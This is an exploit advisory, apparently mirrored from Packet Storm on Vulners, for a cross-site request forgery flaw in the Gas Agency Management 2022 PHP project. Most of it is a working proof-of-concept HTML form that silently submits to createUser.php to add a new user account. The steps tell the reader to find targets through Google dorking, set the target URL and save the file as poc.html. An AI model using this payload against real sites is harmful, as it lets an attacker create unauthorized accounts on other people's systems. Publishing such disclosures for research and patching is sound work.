Lucene search
K

Gas Agency Management 2022 Cross Site Request Forgery

🗓️ 12 Aug 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 196 Views

Gas Agency Management CSRF Vulnerability windows 10 Mozilla firefox 125.0.1 createUser.ph

Code
`=============================================================================================================================================  
| # Title : Gas Agency Management 2022 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new user .  
  
[+] Go to the line 1.  
  
[+] Set the target site link Save changes and apply .   
  
[+] infected file : /php_action/createUser.php.  
  
[+] http://127.0.0.1/gasmark/php_action/createUser.php.  
  
[+] save code as poc.html .  
  
<form class="form-horizontal" method="POST" id="submitUserForm" action="http://127.0.0.1/gasmark/php_action/createUser.php" enctype="multipart/form-data">  
  
<input type="hidden" name="currnt_date" class="form-control">  
  
<div class="form-group">  
<div class="row">  
<label class="col-sm-3 control-label">Username</label>  
<div class="col-sm-9">  
<input type="text" name="userName" id="username" class="form-control" placeholder="Username" required="" pattern="^[a-zA-z0-9]+$">  
</div>  
</div>  
</div>  
<div class="form-group">  
<div class="row">  
<label class="col-sm-3 control-label">Password</label>  
<div class="col-sm-9">  
<input type="password" class="form-control" id="upassword" placeholder="Password" name="upassword">  
</div>  
</div>  
</div>  
<div class="form-group">  
<div class="row">  
<label class="col-sm-3 control-label">Email</label>  
<div class="col-sm-9">  
<input type="email" class="form-control" id="uemail" placeholder="Email" name="uemail">  
</div>  
</div>  
</div>  
  
  
<button type="submit" name="create" id="createUserBtn" class="btn btn-primary btn-flat m-b-30 m-t-30">Submit</button>  
</form>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
196